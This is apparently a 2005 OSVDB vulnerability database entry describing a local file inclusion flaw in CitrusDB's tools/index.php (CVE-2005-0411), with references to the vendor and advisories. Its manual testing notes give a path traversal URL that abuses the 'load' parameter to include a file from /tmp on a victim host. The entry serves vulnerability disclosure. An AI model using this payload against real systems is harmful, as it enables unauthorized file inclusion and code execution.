CitrusDB index.php load Parameter Traversal Arbitrary Local File Inclusion

2005-02-13T12:55:52
ID OSVDB:13786
Type osvdb
Reporter RedTeam Pentesting()
Modified 2005-02-13T12:55:52

Description

Manual Testing Notes

http://[victim]/citrusdb/tools/index.php?load=../../../../../../tmp/exploit

References:

Vendor URL: http://www.citrusdb.org/ Other Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2005-005.txt Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0269.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0230.html CVE-2005-0411